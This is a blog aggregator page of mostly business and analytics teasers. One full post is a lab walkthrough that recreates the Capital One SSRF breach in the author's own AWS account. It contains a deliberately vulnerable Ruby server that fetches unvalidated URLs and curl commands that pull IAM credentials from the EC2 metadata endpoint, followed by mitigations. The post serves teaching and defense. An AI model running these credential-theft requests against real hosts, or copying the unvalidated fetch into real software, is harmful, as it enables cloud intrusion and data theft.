
Planet Big Data is an aggregator of blogs about big data, Hadoop, and related topics. We include posts by bloggers worldwide. Email us to have your blog included.

 

August 23, 2019


Forrester Blogs

VMware Signals The End Of “Endpoint” Detection And Response

The acquisition of Carbon Black by VMware was a bit of a surprise to me, but once put into perspective it makes sense. First, a few observations from a value perspective. Carbon Black brings a strong...

...

Forrester Blogs

Channel Marketers Need To Become Community Marketers – Here’s How

A lot has changed in the 25+ years I have spent in the technology channel. New technologies, partner business models, shifting demographics, expanding...

...

Forrester Blogs

Collective Bargaining: Your Biggest Risk In The Age Of The Customer

Social media has created customer groups that coalesce around a brand — in effect, a union. They collectively can and will change your corporate policy. With collective bargaining, business as usual...

...

Forrester Blogs

VMware Welcomes Estranged Sibling Pivotal Back Home

On August 22, 2019, VMware announced that it will acquire sister company Pivotal Software, vendor of a widely used cloud development platform, Pivotal Cloud Foundry. The transaction is a...

...

Simplified Analytics

Register for our Digital Marketing Workshop

Running your own business comes with a lot of challenges. Digital Marketing does not need to be one of them. Our workshop will give you practical approaches with automation tools and more than 6...

...
 

August 22, 2019


Forrester Blogs

Digitally Evolving Customer Mindsets Will Reshape India’s Financial Services Landscape

Indian financial services customers are changing! Forrester surveyed 3,000 online adults in India about their attitudes about, expectations of, and preferences for financial services and found that...

...

Forrester Blogs

The State Of Influencer Marketing: Growing

For all the dramatic headlines about influencers, our research states that they’re capturing steadily larger proportions of marketing budget. For our latest report, we interviewed more than 30...

...

Forrester Blogs

Become An Adaptive Thinker: Flex Between Divergence And Convergence

Every business runs on thinking, mostly in two modes: divergent and convergent. I’ve been researching this, and I just published my findings in a new report to help individuals, teams, and...

...
InData Labs

What Computer Vision Is and What It Gives Technology-Led Industries

Computer vision is a subsection of artificial intelligence (AI) that is on the rise. Its focus is on developing and refining techniques that let machines see and understand digital images and video content. Today, we live in a reality awash in visual information. According to HubSpot, 54% of consumers want their favorite brands to deliver...

The post What Computer Vision Is and What It Gives Technology-Led Industries appeared first on InData Labs.

 

August 21, 2019


Forrester Blogs

US Tech Spending Slowdown Amid Rising Cloud Adoption Will Squeeze Tech Budgets

Recent stock and bond market turmoil has highlighted the growing risk of a US economic slowdown and even a recession — a prospect that 74% of economists think will happen by 2021, according to a...

...
Cloud Avenue Hadoop Tips

How the Capital One hack was achieved in the AWS Cloud?

DISCLOSURE: The intention of this blog is NOT to help others hack, but to make sure they can secure their applications built on top of AWS or some other cloud. A few mitigations to fix the SSRF vulnerability and others are mentioned towards the end of the blog.

Introduction

Capital One hosted their services on AWS and it was hacked (1, 2, 3). Data was downloaded from AWS S3. An AWS feature was exploited, combined with a misconfiguration by Capital One, and the hack was carried out by an ex-AWS employee. The information about the hack was everywhere in the news, but it was all in bits and pieces. It took me some time to recreate the hack in my own AWS account. This blog is about the sequence of steps to recreate the same hack in your own AWS account.

I came across the SSRF vulnerability recently, but it looks like it has been around for ages, and still the different organizations using the AWS Cloud didn't patch the vulnerability. The hacker was able to get data from 30 different organizations. I hope this documentation will help a few to fix the hole in some applications and also to design/build secure applications.

Here I am going with the assumption that the readers are familiar with the different AWS concepts like EC2, Security Group, WAF and IAM, and also that they have an account with AWS. The AWS free tier should be good enough to try the steps.


Steps to recreate the Capital One hack

Step 1: Create a Security Group that opens port 80 for HTTP and port 22 for SSH, with the source restricted to My IP.

Step 2: Create an Ubuntu EC2 instance of type t2.micro, attach the above Security Group to it and log in via PuTTY.

Step 3: Create an IAM role (Role4EC2-S3RO) with the AmazonS3ReadOnlyAccess policy and attach the role to the above Ubuntu EC2 instance. Attach a policy with very limited privileges, like S3 read-only or something else behind which there is no critical data.

Step 4: Test the below curl command on the Ubuntu EC2 instance to get the IAM role credentials via the EC2 Metadata Service.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 5: Install Ruby and Sinatra on the Ubuntu EC2 instance. The last command takes a few minutes to execute.

sudo apt-get update
sudo apt-get install ruby
sudo gem install sinatra

Step 6: Create a server.rb file with the below content on the Ubuntu EC2 instance. This creates a web server which takes a URL as input, opens it and sends the URL content as the output to the browser. The input URL is never validated in the below code, so it can also be made to reach an internal network URL, which is exactly how the hack worked.

require 'sinatra'
require 'open-uri'

# Deliberately vulnerable: the url parameter goes straight into open
# with no check on its scheme or host, so any URL the instance can
# reach (including internal ones) is fetched and echoed back.
get '/' do
  format 'RESPONSE: %s', open(params[:url]).read
end

The above program keeps running in the foreground, serving requests until it is stopped, so another PuTTY session has to be opened to execute the below commands.

Step 7: Get the Private IP of the Ubuntu EC2 instance, put it in place of 1.2.3.4 in the below command and execute it on the Ubuntu EC2 instance. This starts the web server using the above Ruby program.

sudo ruby server.rb -o 1.2.3.4 -p 80

Step 8: Run the below command on the Ubuntu EC2 instance. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. server.rb will call google.com and return the response.

curl http://5.6.7.8:80/\?url\=https://www.google.com/

Now, run the below command. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. Notice that the security credentials of the role attached to the Ubuntu EC2 instance are displayed as the response to the below command.

curl http://5.6.7.8:80/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 9: Open the below URL in a browser from your machine to get the security credentials of the IAM role displayed in the browser. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance.

http://5.6.7.8:80?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

This is how Capital One and other organizations got hacked via the SSRF vulnerability. Once the hacker got the security credentials via the browser, it's all about using the AWS CLI or SDK to get the data from S3 or elsewhere, depending on the policy attached to the IAM role.

Many times websites ask us to enter our LinkedIn profile URL or Twitter URL, then call it to get more information about us. The same feature can be exploited to invoke any other URL and get at details behind the firewall, if the security is not configured properly. In the above command a call is made to 169.254.169.254 (an internal network IP) to get the credentials via the EC2 Metadata Service.

Step 10: Make sure to terminate the EC2 instance and delete the role.

Mitigations around the SSRF

Any one of the below steps would have stopped the Capital One hack or any other like it.

1. Review the application code for SSRF attacks and perform proper validation of the inputs.

2. Add a WAF rule that detects the "169.254.169.254" string and blocks the request before it reaches the EC2 instance, as shown in the diagram at the beginning of the blog.

3. Change the Ubuntu EC2 instance to block calls to 169.254.169.254 from any process that is not running as root:
iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

4. Use services like AWS Macie to detect anomalies in the data access pattern and take preventive action. There are many 3rd-party services which, when integrated with S3, will identify anomalies in the S3 access patterns and notify us. I haven't worked on such tools.

5. In the case of Capital One, I am not sure if the EC2 instance required AmazonS3ReadOnlyAccess, but it's always better to give any resource the minimum privileges it requires.

Conclusion

AWS claims that their systems were secure and that it is to do with the misconfiguration of the AWS WAF by Capital One and a few other things like giving excessive permissions to EC2 via the IAM role. I agree with it, but AWS should also not have left the EC2 metadata service wide open to anyone with access to the EC2 instance. Not sure how AWS would fix it; any change to the EC2 metadata interface would break the existing applications using it. The letter from AWS to US Senator Wyden on this incident is an interesting read.

Whether one blames AWS or Capital One, in the end it's the customers of the 30 different organizations who have to suffer.

References

Retrieving the Role Security Credentials via EC2 Metadata

EC2s most dangerous feature

What is Sinatra?

What is SSRF and code for the same

On Capital One from Krebs (1, 2)

On Capital One From Evan (1)

Technical analysis of the hack by CloudSploit

WAF FAQ

Forrester Blogs

Why Chatbots Can’t Read Your Mind

Chatbots — And Why They Can’t Read Your Mind Chatbots are cropping up everywhere, from customer service to internal help desks, but what makes them tick? When we interact with chatbots, we’re often...

...

Forrester Blogs

Maintain Your Security Edge: Develop And Retain Cybersecurity Talent

As an industry, we gripe about hiring and struggle with retention. My colleagues Jeff, Chase, and JB have written about how the cybersecurity staffing shortage is predominantly self-inflicted in...

...

Forrester Blogs

Data Scientists Aren’t Just About The Numbers — And Other Lessons From IDEO About The Collision Between Design And Data Science

As part of my research about data science and design, I spoke with Ovetta Sampson, design research lead at IDEO, a global design company. Sampson’s advice that stood out most to me about how to...

...

Forrester Blogs

Product Teams For Infrastructure And Operations

As an analyst at Forrester, I talk to a lot of IT professionals. One of the most common inquiries lately goes something like this: “We’ve piloted DevOps and Agile and like the results....

...
 

August 20, 2019


Forrester Blogs

The Importance Of Defining Event ROI In The B2B Marketing Mix

“If a tree falls in a forest and no one is around to hear it, does it make a sound?” This question, first attributed to philosopher George Berkeley in 1710, raises debates about...

...
 

August 19, 2019


Forrester Blogs

CX SF 2019: Don’t Claim A Good CX Until Customers Say They’ve Succeeded

Shortly after I joined Forrester’s customer experience (CX) research team, I took a trip out to San Francisco to visit with some of my old friends and contacts in the tech industry. While there, I...

...

Forrester Blogs

FORRward: A Weekly Read For Tech And Marketing Execs

The Great Gender Blur And Its Impact On The Future Of Marketing Marketing stands at the threshold of a monumental cultural shift — the great gender blur. The male-female binary and all its associated...

...

Forrester Blogs

The Future Of Retail: From Store To Stage

Did you know that 90 former Toys R Us big-box stores are now Urban Air Adventure Parks? Here at Forrester, we’ve been anticipating that retail, entertainment, and hospitality would ultimately...

...

Forrester Blogs

Reflections On Bosch ConnectedWorld 2019

Bosch ConnectedWorld — Bosch’s premier customer and partner event held annually in Berlin — has become a destination event for European internet of things (IoT) professionals.

...

Antonio Cangiano

Join My Team at IBM

This is a heads up that my team has several developer positions available. The job post is not live yet, but it will be shortly. If you are interested and you meet the requirements below, feel free...

...
 

August 16, 2019


Forrester Blogs

Revlon’s Cautionary Tale: The Changing Nature Of Influencer Marketing

A Giant In Trouble: Revlon Considers A Sale Cosmetic giant Revlon is exploring the sale of all or some of its business amid lackluster sales and a crushing debt of $3 billion. The iconic...

...

Forrester Blogs

The Insights Beat: The Times They Are A-Changin’

Come gather ’round, people, wherever you roam And admit that the waters around you have grown And accept it that soon you’ll be drenched to the bone If your time to you is worth...

...

Simplified Analytics

Are you struggling to make the most from smaller digital marketing budget?

Register for a small investment of Rs 3540 including taxes and ensure you can reach most of your audience. http://meudyojak.com/portfolio/digital-marketing-workshop/ #GoingDigital #DigitalStrategy...

...
 

August 15, 2019


Forrester Blogs

Introducing Autonomous Finance: Forrester’s New Research On Algorithm-Based Financial Services

People’s lives are becoming ever more automated as millions of algorithms make decisions — and, in some cases, take actions on those decisions — on behalf of a consumer. While it’s still early days,...

...
 

August 14, 2019


Forrester Blogs

The Future Of Insurance

Given the pace of social change and technological innovation, the future of insurance is very interesting! We recently published research on the future of insurance in which we offer perspectives on...

...
 

August 13, 2019


Forrester Blogs

Data Science And Design Collide — There’s A Better Way

Last August, a tweet from a data scientist reminding colleagues to get out of tables of data and talk to real people — you know, do qualitative research — went viral among these two constituencies....

...

Forrester Blogs

Rated H For Headless (Is Headless CMS For Mature Audiences Only?)

My colleague Joe Cicman just published a new report (“The New Commerce Revolution: Off With Their Heads (Or Not!“) to help de-hype headless commerce. Much of that work is also very...

...

Forrester Blogs

Headless Commerce And The Horseless Carriage

As with any high-consideration purchase, there’s an expectation of a bedside manner. Buying an eCommerce platform is no exception. But all too often, I hear it feels a lot like this doctor’s visit ....

...

Forrester Blogs

Build Your Next-Generation Business Case Using A Lifecycle

So you’ve got a great new idea for how technology-driven innovations can transform your business, reinvent the way employees work, and/or drive customer obsession. That’s a great start!...

...

Forrester Blogs

Digital Business: Bosch ConnectedWorld 2019 Analysis

Bosch ConnectedWorld — Bosch’s premier customer and partner event held annually in Berlin — has become a destination event for European internet of things (IoT) professionals. What started several...

...

Forrester Blogs

Embed AI In Your Digital Supply Chain To Win, Serve, And Retain Customers

It’s now just over 12 months since we first published research on digital supply chains. Some Forrester clients have made progress with integrated business planning and with control towers. And they...

...

Simplified Analytics

How To Exploit Digital Marketing For Your Business

1. Do you feel #digitalmarketing is an integral part of your Marketing? 2. Do you face challenges in keeping in touch with your existing customers and prospects? 3. Do you feel...

...
 

August 12, 2019


Forrester Blogs

CX SF 2019: Dark Patterns Hurt Customers And The Companies That Use Them — When The Dark Side Calls, How Will You Answer?

Growth hacking. Chief growth officer. Conversion rate optimization. Engagement. All terms and titles that highlight the interests of the company over the interests of its customers. Is it any wonder,...

...

Revolution Analytics

AI, Machine Learning and Data Science Roundup: July/August 2019

A mostly monthly roundup of news about Artificial Intelligence, Machine Learning and Data Science. This is an eclectic collection of interesting blog posts, software announcements and data...

...

Forrester Blogs

FORRward: A Weekly Read For Tech And Marketing Execs

Salesforce Crosses The Physical-Digital Divide With ClickSoftware Acquisition Salesforce signed a definitive agreement to acquire Israeli field service software firm ClickSoftware for approximately...

...
 

August 09, 2019


SoftBase

SoftBase attending Regional Db2 Users Group meetings in September, 2019

SoftBase will be represented at these Regional Db2 Users Group meetings: St. Louis (STLDUG), September 10, 2019 Wisconsin (WDUG), September 11, 2019 Midwest (MWDUG), September 19, 2019

...

Forrester Blogs

Business Gets Personal: Why Executives Cannot Decouple Individual Values From Company Values

Consumers have been assessing companies’ political and social affiliations for years. Now, executives’ personal values are critical to the assessment.

...

Forrester Blogs

Broadcom Buys Symantec’s Enterprise Biz: Good News For Investors, Bad News For Enterprises

Yesterday, Broadcom announced a definitive deal to acquire the enterprise business of Symantec for $10.7 billion in cash. This deal caps weeks of speculation that Symantec was in play, initiated in...

...

Forrester Blogs

Salesforce Buys ClickSoftware To Bolster Its Field Service Offering

Salesforce continues its fast and furious acquisition spree by picking up ClickSoftware for $1.53 billion to beef up its field service capabilities. Field service is a rapidly growing area in CRM....

...
 

August 08, 2019


Forrester Blogs

Use Forrester’s Customer Service Wave™ To Guide Your Product Selection

Not all customer service vendor solutions are a good fit for your organization, and choosing the right one depends on the number of agents you have, your growth projections, your business model, the...

...

Forrester Blogs

Laud Your Whistleblowers Or Pay The Price

Companies that don’t take ethical behavior seriously face lasting brand damage, fines, and years of enforcement actions with ongoing lawsuits. However, companies that operate at a high moral and...

...

Forrester Blogs

Last-Mile Delivery: eCommerce’s Future Depends On Innovation In Package Delivery

15 billion — that’s how many eCommerce orders were delivered last year to customers in the US. Not only are the costs of these shipments increasing, but many of those deliveries are inefficient and...

...

Forrester Blogs

European Digital Advertising Gets Knocked Down But Gets Back Up Again (Kind Of)

European digital advertising has had a challenging year thanks to GDPR, EU fines, and social media scandals. Growth in digital advertising spending is decelerating, and adtech providers are...

...

Forrester Blogs

Customer Effort: How To Measure It Right

How do you measure customer effort? Most customer experience (CX) pros use surveys. While the question text and scale they use can differ, the resulting score measures the level of effort. But we...

...

Forrester Blogs

Translating Security For Small Business

This week is Black Hat — the annual Hacker Summer Camp, as many folks call it. And this year is the first year in 14 years I haven’t been there. This year, I intentionally took an opportunity...

...

Forrester Blogs

Zero Trust In Action

Watch this video to see what happens when a threat attacks a Zero Trust environment compared to a perimeter-based one.

...
 

August 07, 2019


Forrester Blogs

Infrastructure Automation Platforms: Coopetition At Its Fiercest

Why Infrastructure Automation? I used to kid around with my research director, Glenn O’Donnell, that my previous Forrester Wave™ evaluation on configuration management was the “Wave no...

...

Forrester Blogs

Asia Pacific Financial Consumers’ Digital Coming Of Age Is Here — Is Your Firm Ready?

Something remarkable is happening with Asia Pacific online adults: Their behaviors and expectations are evolving at an unprecedented rate, and they’re embracing innovation faster than ever before....

...
 

August 06, 2019


Forrester Blogs

Insights, Analytics, And The Myth Of The Magician’s Reveal

When it comes to kicking off (or growing) an analytics initiative, there’s an obstacle right out of the gate. It’s building the business case — the effort of persuading budget holders and other...

...

Forrester Blogs

Security & Risk 2019: Cybersecurity’s Staffing Shortage Is Self-Inflicted

Unless this is your first day working in cybersecurity, you’ve heard numerous times that we have a hiring crisis — there aren’t enough people to fill the need for security talent. Current projections...

...
InData Labs

InData Labs at Imaguru Data Challenge, Datathon 2019

Two weeks back, on 19-21 July, our team took part in the 3rd Datathon, Imaguru Practical Data Challenge. The competition was held with the support of the US Agency for International Development, USAID, in Belarus. Over the three days, 12 teams consisting of 120 participants worked hard to nail the tasks by Datathon partner companies:...

The post InData Labs at Imaguru Data Challenge, Datathon 2019 appeared first on InData Labs.


Forrester Blogs

Data Literacy Matters — Do We Have To Spell It Out?!

In the words of Thomas Edison, the value of an idea lies in the using of it. Yeah, I’ve used that quote a lot to talk about the value of data. Data isn’t inherently valuable. But when you use it to...

...